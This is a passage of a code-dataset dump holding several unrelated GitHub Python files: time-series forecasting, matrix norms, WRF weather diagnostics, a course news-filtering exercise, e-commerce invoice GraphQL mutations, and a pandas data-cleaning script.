df_valid.iloc[(i-48):i].forecast_normal)\n MAPE_d = mean_absolute_percentage_error(df_valid.iloc[(i-48):i].avg, df_valid.iloc[(i-48):i].forecast_normal)\n if(i==48):\n print(\"RMSE for 01-04-2018:\", RMSE_d)\n print(\"\\nMAE for 01-04-2018:\", MAE_d)\n print(\"\\nMAPE for 01-04-2018:\", MAPE_d)\n RMSE = RMSE + RMSE_d\n MAE = MAE + MAE_d\n MAPE = MAPE + MAPE_d\n days = days + 1\n \n print(\"RMSE for 30-06-2018:\", RMSE_d)\n print(\"\\nMAE for 30-06-2018:\", MAE_d)\n print(\"\\nMAPE for 30-06-2018:\", MAPE_d)\n print(\"RMSE of Auto ARIMAX:\", RMSE/days)\n print(\"\\nMAE of Auto ARIMAX:\", MAE/days)\n print(\"\\nMAPE of Auto ARIMAX:\", MAPE/days)\n\n\n model.plot_diagnostics(figsize=(15, 12))\n plt.savefig(self.folderPath + '/diagnostics.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n\n self.print_corr(df_valid, 'forecast_normal')\n #correlations = df_valid.corr(method='pearson')\n #print(correlations['Forecast_ARIMAX'].sort_values(ascending=False).to_string())\n \n def dicky_fuller_test(self, x, cutoff = 0.05):\n result = adfuller(x)\n print('ADF Statistic: %f' % result[0])\n print('p-value: %f' % result[1])\n print('Critical Values:')\n for key, value in result[4].items():\n print('\\t%s: %.3f' % (key, value))\n if result[1]>cutoff:\n print(\"Fail to reject the null hypothesis (H0), the data is non-stationary\")\n else:\n print(\"Reject the null hypothesis (H0), the data is stationary.\")\n \n def main(self):\n df_train, df_test = self.split_data(self.df)\n x_train = df_train.drop(columns = ['avg'])\n y_train = df_train['avg'].to_frame()\n y_train_norm, ss = self.normalize(y_train)\n \n x_test = df_test.drop(columns = ['avg'])\n y_test = df_test['avg'].to_frame()\n y_test_norm = self.norm_tra(y_test, ss)\n \n model = self.fit_ARIMA(x_train, y_train)\n results = self.predict(model, x_test, y_test, ss)\n #result['avg'] = y_test.avg\n print(self.modelName + \": \")\n print(model.summary())\n \n #cf_integral = pd.DataFrame(ss.inverse_transform(cf), index = cf.index, columns = cf.columns)\n #print('conf int: ', cf)\n #print('normal conf int', cf_integral)\n print(type(results))\n print('results: \\n', results)\n\n cf = results.conf_int()\n \n #plt.figure(figsize=(12,5), dpi=100)\n #plt.plot(y_train.avg, label='training')\n #plt.plot(y_test.avg, label='actual')\n #plt.plot(results, label='forecast')\n #plt.fill_between(lcf.index, lcf, ucf, \n # color='k', alpha=.15)\n #plt.title('Forecast vs Actuals')\n #plt.legend(loc='upper left', fontsize=8)\n\n #results.index = df_test.index.copy()\n #results.set_index('time', inplace = True)\n\n fig, ax = plt.subplots(1, 1, figsize=(15, 5))\n ax.plot(y_test.avg)\n ax.plot(results.predicted_mean)\n #ax.fill_between(y_test_norm.index,\n # cf[0],\n # cf[1],color='grey',alpha=.3)\n ax.fill_between(results.predicted_mean.index, cf.iloc[:,0], cf.iloc[:,1], color='grey', alpha=0.3);\n plt.savefig(self.folderPath + '/resultsPlot_w_ConfInt.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n \n '''\n fig3, ax3 = plt.subplots(1, 1, figsize=(15, 5))\n ax3.plot(y_test.avg)\n ax3.plot(results.forecast_normal)\n ax3.fill_between(y_test.index,\n cf_integral[0],\n cf_integral[1],color='grey',alpha=.3)\n plt.savefig(self.folderPath + '/resultsPlot_wConfInt_normal.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n '''\n \n \n fig2, ax2 = plt.subplots(1, 1, figsize=(15, 5))\n ax2.plot(y_test.avg)\n ax2.plot(results.predicted_mean)\n plt.savefig(self.folderPath + '/resultsPlot_normal.pdf')\n plt.close()\n plt.cla()\n plt.clf()\n \n #results_test = pd.concat([df_test, results], axis=1)]\n df_test['forecast_normal'] = results.predicted_mean\n\n self.residual_analysis(df_test)\n self.evaluation(df_test, model)\n \n model.save(self.folderPath +'/'+ self.modelName)\n #with open(self.folderPath +'/'+ self.modelName, 'wb') as pkl:\n # pickle.dump(model, pkl)\n \n \n \n\n","repo_name":"alexchelba/Electricity-Analysis","sub_path":"ARIMA/modelHelper.py","file_name":"modelHelper.py","file_ext":"py","file_size_in_byte":10230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"26658456512","text":"import numpy as np\n\n\ndef get_norma1_for_vector(vector):\n x = 0\n\n for index in range(0, vector.shape[0]):\n x += abs(vector[index])\n\n return x\n\n\ndef get_infinity_normal_for_matrix(matrix):\n x = 0\n for i in range(matrix.shape[0]):\n x = 0\n for j in range(matrix.shape[1]):\n x += abs(matrix[i][j])\n return x\n\n\ndef get_normal1_for_matrix(matrix):\n x = 0\n for i in range(matrix.shape[0]):\n x = 0\n for j in range(matrix.shape[1]):\n x += abs(matrix[j][i])\n return x\n\n\ndef input_matrix():\n rows = int(input(\"Input number of rows: \"))\n col = int(input(\"Input numbers of columns: \"))\n\n matrix = []\n print(\"Input numbers\")\n for i in range(rows):\n a = []\n for j in range(col):\n a.append(input())\n matrix.append(a)\n matrix2 = np.array(matrix, dtype=float)\n return matrix2\n\n\ndef input_vector():\n row = int(input(\"Input length of vector: \"))\n vector = []\n\n print(\"Input numbers\")\n for i in range(row):\n vector.append(input())\n vector2 = np.array(vector, dtype=float)\n\n return vector2\n\n\nif __name__ == '__main__':\n #vector1 = np.array([0.1, 2, -5], dtype=float)\n\n #matrix1 = np.array([[0.1, 2, -5],\n #[5, 1.2, 7],\n #[3, 4, 8]], dtype=float)\n\n vector1 = input_vector()\n matrix1 = input_matrix()\n\n print(vector1, \"\\n\")\n print(matrix1, \"\\n\")\n print(f\"Normal 1 for vector: {get_norma1_for_vector(vector1)}\\tInfinity normal for matrix: \"\n f\"{get_infinity_normal_for_matrix(matrix1)}\\t\"\n f\"Normal 1 for matrix: {get_normal1_for_matrix(matrix1)}\")\n","repo_name":"Singrity/MatrixAndVectorNorms","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32912534437","text":"\"\"\"\nSome wrappers for Pat Skinner's code in:\nnews_e_post_environment.py\n\nThese OG scripts can be found in my GitHub repo \"objectID\" in /src.\n\"\"\"\nimport pdb\nimport os\nimport time\n\nimport numpy as N\n\nimport evac.derived.pat as pat\n\ndef compute_CAPE(nc=None,P=None,PB=None,PH=None,PHB=None,T=None,QVAPOR=None,QCLOUD=None,\n QRAIN=None,QICE=None,QSNOW=None,QGRAUP=None,PSFC=None,tidx=None):\n \"\"\"\n You need either:\n * nc\n * tidx\n Or:\n * P\n * PB\n * PH\n * PHB\n * T\n * QVAPOR\n * QCLOUD\n * QRAIN\n * QICE\n * QSNOW\n * QGRAUP\n * PSFC\n\n The second group are the WRF \"keys\" for various fields as a mnemonic. These are 3D numpy\n fields, apart from PSFC, which is 2D.\n\n Find the WRF \"key\" meanings here: \n http://www2.mmm.ucar.edu/wrf/users/docs/user_guide_V3/users_guide_chap5.htm#fields\n\n ============\n THE FOLLOWING IS JUST FOR JRL - NOTES\n ============\n We need:\n * t_env - 3d numpy array [z,y,x] of environmental temperature (K)\n * t_parc - 3d numpy array [z,y,x] of lifted parcel temperature (K)\n * p - 3d numpy array [z,y,x] of environmental pressure (hPa)\n * lcl_p - 2d numpy array [y,x] of LCL pressure (hPa)\n * dz - 3d numpy array [y,x] of vertical grid spacing for each grid point (m)\n\n\n Pat does:\n calc_cape(t_v, t_100mb_parcel, p, lcl_p_100mb, dz) \n Where:\n * t_v = calc_thv(temp, qv, qt)\n * temp is calc_t(th,p)\n * p = (p + pb) / 100\n * p and pb (P, PB) from WRF - NEED\n * th is T from WRF, + 300 - NEED\n * qv is QVAPOR from WRF - NEED\n * qt is sum of QCLOUD, QRAIN, QICE, QSNOW, QGRAUP - NEED ALL\n * t_100mb_parcel = calc_parcel_dj(p, th_e_100mb[f,:,:], t_v_100mb, p_100mb)\n * (p)\n * th_e_100mb[f,:,:], lcl_t_100mb = calc_the_bolt(p_100mb, t_100mb, qv_100mb)\n * f is what? forecast time I think...\n * p_100mb = N.ma.average(masked_p, axis=0, weights=dz)\n * masked_p = N.ma.masked_where((p_sfc_temp - p) > 100., (p))\n * p_sfc_temp = PSFC from WRF [0,:,:] / 100 - NEED\n * (p)\n * z, dz = calc_height(ph, phb)\n * PH, PHB from WRF\n * t_100mb = N.ma.average(masked_temp, axis=0, weights=dz)\n * masked_temp = N.ma.masked_where((p_sfc_temp - p) > 100., (temp))\n * qv_100mb = N.ma.average(masked_qv, axis=0, weights=dz)\n * masked_qv = N.ma.masked_where((p_sfc_temp - p) > 100., (qv))\n * t_v_100mb = N.ma.average(masked_t_v, axis=0, weights=dz)\n * masked_t_v = N.ma.masked_where((p_sfc_temp - p) > 100., (t_v))\n * (p_100mb)\n * (p)\n * lcl_p_100mb = 1000. / (th_v_100mb[f,:,:] / lcl_t_100mb)**(1004. / 287.)\n * th_v_100mb[f,:,:] = N.ma.average(masked_th_v, axis=0, weights=dz)\n * masked_th_v = N.ma.masked_where((p_sfc_temp - p) > 100., (th_v))\n * th_v = calc_thv(th, qv, qt)\n * (th) - don't forget the +300\n * (qv)\n * (qt)\n * (lcl_t_100mb)\n * (dz)\n \n \"\"\"\n if nc is not None:\n # only one time\n assert isinstance(tidx,int)\n P = nc.variables['P'][tidx,...]\n PB = nc.variables['PB'][tidx,...]\n PH = nc.variables['PH'][tidx,...]\n PHB = nc.variables['PHB'][tidx,...]\n T = nc.variables['T'][tidx,...]\n QVAPOR = nc.variables['QVAPOR'][tidx,...]\n QCLOUD = nc.variables['QCLOUD'][tidx,...]\n QRAIN = nc.variables['QRAIN'][tidx,...]\n QICE = nc.variables['QICE'][tidx,...]\n QSNOW = nc.variables['QSNOW'][tidx,...]\n QGRAUP = nc.variables['QGRAUP'][tidx,...]\n PSFC = nc.variables['PSFC'][tidx,...]\n\n qt = QCLOUD + QRAIN + QICE + QSNOW + QGRAUP\n th = T+300.0\n p = (P+PB)/100.0\n z, dz = pat.calc_height(PH, PHB)\n # pdb.set_trace()\n p_sfc_temp = PSFC/ 100.0\n temp = pat.calc_t(th,p)\n\n t_v = pat.calc_thv(temp, QVAPOR, qt)\n th_v = pat.calc_thv(th, QVAPOR, qt)\n\n masked_p = N.ma.masked_where((p_sfc_temp - p) > 100., (p))\n masked_temp = N.ma.masked_where((p_sfc_temp - p) > 100., (temp))\n masked_qv = N.ma.masked_where((p_sfc_temp - p) > 100., (QVAPOR))\n masked_t_v = N.ma.masked_where((p_sfc_temp - p) > 100., (t_v))\n masked_th_v = N.ma.masked_where((p_sfc_temp - p) > 100., (th_v))\n\n p_100mb = N.ma.average(masked_p, axis=0, weights=dz)\n t_100mb = N.ma.average(masked_temp, axis=0, weights=dz)\n qv_100mb = N.ma.average(masked_qv, axis=0, weights=dz)\n t_v_100mb = N.ma.average(masked_t_v, axis=0, weights=dz)\n\n th_e_100mb, lcl_t_100mb = pat.calc_the_bolt(p_100mb, t_100mb, qv_100mb)\n th_v_100mb = N.ma.average(masked_th_v, axis=0, weights=dz)\n\n t_100mb_parcel = pat.calc_parcel_dj(p, th_e_100mb, t_v_100mb, p_100mb)\n\n lcl_p_100mb = 1000. / (th_v_100mb / lcl_t_100mb)**(1004. / 287.)\n\n CAPE = pat.calc_cape(t_v,t_100mb_parcel,p,lcl_p_100mb,dz)\n # pdb.set_trace()\n # Not masked\n return CAPE.data\n\ndef check_convert_agl(km,check=True):\n if check and (km > 100):\n print(\"Warning: are you sure bottom_km and top_km are in km?\")\n time.sleep(2)\n\n m = km * 1000.0\n return m\n\ndef compute_SRH(nc,tidx,bottom_km=0,top_km=3):\n if nc is not None:\n # only one time\n assert isinstance(tidx,int)\n P = nc.variables['P'][tidx,...]\n PB = nc.variables['PB'][tidx,...]\n PH = nc.variables['PH'][tidx,...]\n PHB = nc.variables['PHB'][tidx,...]\n HGT = nc.variables[\"HGT\"][tidx,...] \n U = nc.variables[\"U\"][tidx,...] \n V = nc.variables[\"V\"][tidx,...] \n\n bottom_m = check_convert_agl(bottom_km,check=False)\n top_m = check_convert_agl(top_km)\n p = (P+PB)/100.0\n\n uc = destagger(U,\"U\")\n vc = destagger(V,\"V\")\n\n z, dz = pat.calc_height(PH, PHB)\n z_agl = z - HGT\n\n bunk_r_u, bunk_r_v, bunk_l_u, bunk_l_v = pat.calc_bunkers(p, z_agl, dz, uc, vc)\n srh_0to3 = pat.calc_srh(z_agl, uc, vc, dz, bottom_m, top_m, bunk_r_u, bunk_r_v)\n return srh_0to3.data\n\ndef destagger(arr3d,grid_type):\n assert arr3d.ndim == 3\n if grid_type == \"U\":\n new_arr = (arr3d[:,:,:-1]+arr3d[:,:,1:])/2. \n elif grid_type == \"V\":\n new_arr = (arr3d[:,:-1,:]+arr3d[:,1:,:])/2.\n else:\n raise Exception\n return new_arr\n\ndef compute_shear(nc,tidx,bottom_km=0,top_km=1):\n if nc is not None:\n assert isinstance(tidx,int)\n U = nc.variables[\"U\"][tidx,...] \n V = nc.variables[\"V\"][tidx,...] \n P = nc.variables['P'][tidx,...]\n PB = nc.variables['PB'][tidx,...]\n PH = nc.variables['PH'][tidx,...]\n PHB = nc.variables['PHB'][tidx,...]\n HGT = nc.variables[\"HGT\"][tidx,...] \n\n bottom_m = check_convert_agl(bottom_km,check=False)\n top_m = check_convert_agl(top_km)\n p = (P+PB)/100.0\n\n uc = destagger(U,\"U\")\n vc = destagger(V,\"V\")\n\n z, dz = pat.calc_height(PH, PHB)\n z_agl = z - HGT\n\n u_shear, v_shear = pat.calc_wind_shear(z_agl, uc, vc, bottom_m, top_m)\n # shear = (u_shear + v_shear)**2\n # return shear.data\n return u_shear, v_shear\n","repo_name":"johnrobertlawson/evac","sub_path":"evac/derived/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"21365087963","text":"# PART 3: FILTERING \n\n\nclass WordTrigger(Trigger):\n def __init__(self,word):\n self.word = word\n\n def isWordIn(self,text):\n word = self.word\n word = word.lower()\n text = text.lower()\n\n import string\n for x in string.punctuation:\n word = word.replace(x,\"\")\n text = text.replace(x,\"\")\n word = word.split()\n text = text.split()\n for word in word:\n if word not in text:\n return False\n else:return True\n\n\nclass TitleTrigger(WordTrigger):\n def evaluate(self,story):\n return self.isWordIn(story.getTitle())\n\n\nclass SubjectTrigger(WordTrigger):\n def evaluate(self,story):\n return self.isWordIn(story.getSubject())\n\nclass SummaryTrigger(WordTrigger):\n def evaluate(self,story):\n return self.isWordIn(story.getSummary())\n \n \nclass PhraseTrigger(Trigger):\n def __init__(self,phrase):\n self.phrase = phrase\n def evaluate(self,story):\n return self.phrase in story.getSubject() or \\\n self.phrase in story.getTitle() or \\\n self.phrase in story.getSummary()\n \ndef filterStories(stories, triggerlist):\n result = []\n \n for story in stories:\n for trigger in triggerlist:\n if trigger.evaluate(story):\n if story not in result:\n result.append(story)\n \n return result\n \n \n \n \n \n\n","repo_name":"iharsh234/MIT6.00x","sub_path":"pset7-P3-Filtering.py","file_name":"pset7-P3-Filtering.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"91"}
+{"seq_id":"7666314158","text":"import graphene\nfrom django.core.exceptions import ValidationError\n\nfrom ...core import JobStatus\nfrom ...core.permissions import OrderPermissions\nfrom ...invoice import events, models\nfrom ...invoice.error_codes import InvoiceErrorCode\nfrom ...invoice.notifications import send_invoice\nfrom ...order import events as order_events\nfrom ..core.mutations import ModelDeleteMutation, ModelMutation\nfrom ..core.types.common import InvoiceError\nfrom ..invoice.types import Invoice\nfrom ..order.types import Order\n\n\nclass InvoiceRequest(ModelMutation):\n order = graphene.Field(Order, description=\"Order related to an invoice.\")\n\n class Meta:\n description = \"Request an invoice for the order using plugin.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n class Arguments:\n order_id = graphene.ID(\n required=True, description=\"ID of the order related to invoice.\"\n )\n number = graphene.String(\n required=False,\n description=\"Invoice number, if not provided it will be generated.\",\n )\n\n @staticmethod\n def clean_order(order):\n if order.is_draft() or order.is_unconfirmed():\n raise ValidationError(\n {\n \"orderId\": ValidationError(\n \"Cannot request an invoice for draft or unconfirmed order.\",\n code=InvoiceErrorCode.INVALID_STATUS,\n )\n }\n )\n\n if not order.billing_address:\n raise ValidationError(\n {\n \"orderId\": ValidationError(\n \"Cannot request an invoice for order without billing address.\",\n code=InvoiceErrorCode.NOT_READY,\n )\n }\n )\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n order = cls.get_node_or_error(\n info, data[\"order_id\"], only_type=Order, field=\"orderId\"\n )\n cls.clean_order(order)\n\n shallow_invoice = models.Invoice.objects.create(\n order=order,\n number=data.get(\"number\"),\n )\n invoice = info.context.plugins.invoice_request(\n order=order, invoice=shallow_invoice, number=data.get(\"number\")\n )\n\n if invoice.status == JobStatus.SUCCESS:\n order_events.invoice_generated_event(\n order=order,\n user=info.context.user,\n app=info.context.app,\n invoice_number=invoice.number,\n )\n else:\n order_events.invoice_requested_event(\n user=info.context.user, app=info.context.app, order=order\n )\n\n events.invoice_requested_event(\n user=info.context.user,\n app=info.context.app,\n order=order,\n number=data.get(\"number\"),\n )\n return InvoiceRequest(invoice=invoice, order=order)\n\n\nclass InvoiceCreateInput(graphene.InputObjectType):\n number = graphene.String(required=True, description=\"Invoice number.\")\n url = graphene.String(required=True, description=\"URL of an invoice to download.\")\n\n\nclass InvoiceCreate(ModelMutation):\n class Arguments:\n order_id = graphene.ID(\n required=True, description=\"ID of the order related to invoice.\"\n )\n input = InvoiceCreateInput(\n required=True, description=\"Fields required when creating an invoice.\"\n )\n\n class Meta:\n description = \"Creates a ready to send invoice.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def clean_input(cls, info, instance, data):\n validation_errors = {}\n for field in [\"url\", \"number\"]:\n if data[\"input\"][field] == \"\":\n validation_errors[field] = ValidationError(\n f\"{field} cannot be empty.\",\n code=InvoiceErrorCode.REQUIRED,\n )\n if validation_errors:\n raise ValidationError(validation_errors)\n return data[\"input\"]\n\n @classmethod\n def clean_order(cls, info, order):\n if order.is_draft() or order.is_unconfirmed():\n raise ValidationError(\n {\n \"orderId\": ValidationError(\n \"Cannot create an invoice for draft or unconfirmed order.\",\n code=InvoiceErrorCode.INVALID_STATUS,\n )\n }\n )\n\n if not order.billing_address:\n raise ValidationError(\n {\n \"orderId\": ValidationError(\n \"Cannot create an invoice for order without billing address.\",\n code=InvoiceErrorCode.NOT_READY,\n )\n }\n )\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n order = cls.get_node_or_error(\n info, data[\"order_id\"], only_type=Order, field=\"orderId\"\n )\n cls.clean_order(info, order)\n cleaned_input = cls.clean_input(info, order, data)\n invoice = models.Invoice(**cleaned_input)\n invoice.order = order\n invoice.status = JobStatus.SUCCESS\n invoice.save()\n events.invoice_created_event(\n user=info.context.user,\n app=info.context.app,\n invoice=invoice,\n number=cleaned_input[\"number\"],\n url=cleaned_input[\"url\"],\n )\n order_events.invoice_generated_event(\n order=order,\n user=info.context.user,\n app=info.context.app,\n invoice_number=cleaned_input[\"number\"],\n )\n return InvoiceCreate(invoice=invoice)\n\n\nclass InvoiceRequestDelete(ModelMutation):\n class Arguments:\n id = graphene.ID(\n required=True, description=\"ID of an invoice to request the deletion.\"\n )\n\n class Meta:\n description = \"Requests deletion of an invoice.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n invoice = cls.get_node_or_error(info, data[\"id\"], only_type=Invoice)\n invoice.status = JobStatus.PENDING\n invoice.save(update_fields=[\"status\", \"updated_at\"])\n info.context.plugins.invoice_delete(invoice)\n events.invoice_requested_deletion_event(\n user=info.context.user, app=info.context.app, invoice=invoice\n )\n return InvoiceRequestDelete(invoice=invoice)\n\n\nclass InvoiceDelete(ModelDeleteMutation):\n class Arguments:\n id = graphene.ID(required=True, description=\"ID of an invoice to delete.\")\n\n class Meta:\n description = \"Deletes an invoice.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n invoice = cls.get_instance(info, **data)\n response = super().perform_mutation(_root, info, **data)\n events.invoice_deleted_event(\n user=info.context.user, app=info.context.app, invoice_id=invoice.pk\n )\n return response\n\n\nclass UpdateInvoiceInput(graphene.InputObjectType):\n number = graphene.String(description=\"Invoice number\")\n url = graphene.String(description=\"URL of an invoice to download.\")\n\n\nclass InvoiceUpdate(ModelMutation):\n class Arguments:\n id = graphene.ID(required=True, description=\"ID of an invoice to update.\")\n input = UpdateInvoiceInput(\n required=True, description=\"Fields to use when updating an invoice.\"\n )\n\n class Meta:\n description = \"Updates an invoice.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def clean_input(cls, info, instance, data):\n number = instance.number or data[\"input\"].get(\"number\")\n url = instance.external_url or data[\"input\"].get(\"url\")\n\n validation_errors = {}\n if not number:\n validation_errors[\"number\"] = ValidationError(\n \"Number need to be set after update operation.\",\n code=InvoiceErrorCode.NUMBER_NOT_SET,\n )\n if not url:\n validation_errors[\"url\"] = ValidationError(\n \"URL need to be set after update operation.\",\n code=InvoiceErrorCode.URL_NOT_SET,\n )\n\n if validation_errors:\n raise ValidationError(validation_errors)\n\n return data[\"input\"]\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n instance = cls.get_instance(info, **data)\n cleaned_input = cls.clean_input(info, instance, data)\n instance.update_invoice(\n number=cleaned_input.get(\"number\"), url=cleaned_input.get(\"url\")\n )\n instance.status = JobStatus.SUCCESS\n instance.save(update_fields=[\"external_url\", \"number\", \"updated_at\", \"status\"])\n order_events.invoice_updated_event(\n order=instance.order,\n user=info.context.user,\n app=info.context.app,\n invoice_number=instance.number,\n url=instance.url,\n status=instance.status,\n )\n return InvoiceUpdate(invoice=instance)\n\n\nclass InvoiceSendNotification(ModelMutation):\n class Arguments:\n id = graphene.ID(required=True, description=\"ID of an invoice to be sent.\")\n\n class Meta:\n description = \"Send an invoice notification to the customer.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def clean_instance(cls, info, instance):\n validation_errors = {}\n if instance.status != JobStatus.SUCCESS:\n validation_errors[\"invoice\"] = ValidationError(\n \"Provided invoice is not ready to be sent.\",\n code=InvoiceErrorCode.NOT_READY,\n )\n if not instance.url:\n validation_errors[\"url\"] = ValidationError(\n \"Provided invoice needs to have an URL.\",\n code=InvoiceErrorCode.URL_NOT_SET,\n )\n if not instance.number:\n validation_errors[\"number\"] = ValidationError(\n \"Provided invoice needs to have an invoice number.\",\n code=InvoiceErrorCode.NUMBER_NOT_SET,\n )\n if not instance.order.get_customer_email():\n validation_errors[\"order\"] = ValidationError(\n \"Provided invoice order needs an email address.\",\n code=InvoiceErrorCode.EMAIL_NOT_SET,\n )\n\n if validation_errors:\n raise ValidationError(validation_errors)\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n instance = cls.get_instance(info, **data)\n cls.clean_instance(info, instance)\n send_invoice(\n instance, info.context.user, info.context.app, info.context.plugins\n )\n return InvoiceSendNotification(invoice=instance)\n","repo_name":"Saleor-Multi-Vendor/saleor-multi-vendor","sub_path":"saleor/graphql/invoice/mutations.py","file_name":"mutations.py","file_ext":"py","file_size_in_byte":11638,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"91"}
+{"seq_id":"10360147488","text":"import os\nos.system(\"clear\")\nimport pandas as pd\n\nprint(\"Leer archivo\\n\")\ndf = pd.read_csv(\"dataframe_clase_3_corregido.csv\")\n\nprint(\"Sacar los espacios de las columnas\\n\")\ncolumns = list(df.columns)\nfor n, c in enumerate(df.columns):\n c = c.lstrip() # lstrip remueve caracteres iniciales en blanco\n columns[n] = c.rstrip() # rstrip hace lo mismo con los caracteres finales\ndf.columns = columns\n\nprint(\"Pasar todo a minúsculas y sacar los espacios\\n\")\ndef aMinusculasYSinEspacios(x) :\n if (type(x) == str) :\n return x.lower().lstrip().rstrip()\n else :\n return x\ndf = df.applymap(aMinusculasYSinEspacios)\n\nprint(\"Corregir la columna sexo\\n\")\n\n# Sacando \"Azul\"\ndf = df[df[\"Sexo\"]!=\"azul\"]\n\n# Pasar a minúsculas\ndef parsearSexo(x) :\n if (\"h\" in x) :\n return \"h\"\n elif (\"m\" in x) :\n return \"m\"\n else :\n return \"o\"\ndf[\"Sexo\"] = df[\"Sexo\"].apply(parsearSexo)\n\nprint(\"Arreglar columna LU (libreta universitaria)\\n\")\ndef arregla_LU(x) :\n lista = [\" \", \"-\", \"//\", \"\\\\\", \".\"]\n for l in lista:\n x = x.replace(l, '/')\n return x\ndef sacarCeros(x) :\n xArray = x.split(\"/\")\n return (\"%i%s%i\" % (int(xArray[0]), \"/\", int(xArray[1])))\ndf[\"LU\"] = df[\"LU\"].apply(arregla_LU)\ndf[\"LU\"] = df[\"LU\"].apply(sacarCeros)\n\n\nprint(\"Arreglar columna Observación\\n\")\ndef arreglarObservacion(x):\n if type(x) == str:\n if \"hiper\" in x:\n return \"hipertension\"\n elif \"dolor\" in x and \"cabeza\" in x:\n return \"dolor de cabeza\"\n else:\n return \"ninguna\"\n else:\n return x\n\ndf[\"Observación\"] = df[\"Observación\"].apply(arreglarObservacion)\n\n\nprint(\"Pasar strings \\\"nan\\\" a verdaderos NaN\\n\")\nimport numpy as numpy\ndef pasarNaN(x) :\n if (x == \"nan\") :\n return numpy.NaN\n else :\n return x\ndf = df.applymap(pasarNaN)\n\nprint(\"Sacar promedios NaN\\n\")\ndf.dropna(subset=[\"Promedio\"], inplace=True)\n\nprint(\"Sacar chars de columnas peso y altura\\n\")\ndef sacarChars(x):\n if type(x)==str:\n return ''.join(c for c in x if c.isdigit() or c=='.') # list comprehension\n else:\n return x\ndf[\"Altura\"] = df[\"Altura\"].apply(sacarChars)\ndf[\"Peso\"] = df[\"Peso\"].apply(sacarChars)\n\n\nprint(\"Pasar a float los promedios, el peso y la altura, y pasar a int las edades\\n\")\ndf['Promedio'] = df['Promedio'].apply(float)\ndf['Peso'] = df['Peso'].apply(float)\ndf['Altura'] = df['Altura'].apply(float)\ndf['Edad'] = df['Edad'].apply(int)\n\n\nprint(\"Sacar outliers de peso\\n\")\ndf = df[numpy.logical_and(df[\"Peso\"] >= 35, df[\"Peso\"] <= 180)]\n\n\nprint(\"Calcular ratio de peso y altura por sexo para aproximar los que no tienen altura\\n\")\ndf[\"PesoAlturaRatio\"] = df[\"Peso\"] / df[\"Altura\"]\ndf_h = df[df[\"Sexo\"] == \"h\"]\ndf_m = df[df[\"Sexo\"] == \"m\"]\nmeanH = df_h[\"PesoAlturaRatio\"].mean()\nmeanM = df_m[\"PesoAlturaRatio\"].mean()\n\nprint(\"Calcular aproximación de los que no tienen altura\\n\")\ndf_h_sinAltura = df[ numpy.logical_and(pd.isnull(df[\"Altura\"]), df[\"Sexo\"]==\"h\") ]\ndf_m_sinAltura = df[ numpy.logical_and(pd.isnull(df[\"Altura\"]), df[\"Sexo\"]==\"m\") ]\n\npd.options.mode.chained_assignment = None # default='warn'\n # Pandas tiene una advertencia para asignaciones de este tipo porque son riesgosas\ndf_h_sinAltura[\"Altura\"] = (df_h_sinAltura[\"Peso\"] / meanH).round(2)\ndf_m_sinAltura[\"Altura\"] = (df_m_sinAltura[\"Peso\"] / meanM).round(2)\n\ndf.loc[df_h_sinAltura.index, :] = df_h_sinAltura[:]\ndf.loc[df_m_sinAltura.index, :] = df_m_sinAltura[:]\n\n\nprint(\"Dropear columna del ratio\\n\")\ndf.drop(columns=[\"PesoAlturaRatio\"], inplace=True)\n\n\nprint(\"Calcular aproximación de los que no tienen altura\\n\")\ndf.to_csv(\"mi_correccion.csv\", index=False)\n\nprint(df)","repo_name":"aeserein/laboratorio-de-datos-fisica-uba","sub_path":"Clase 03 - Preparación, estandarización, normalización de datos/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
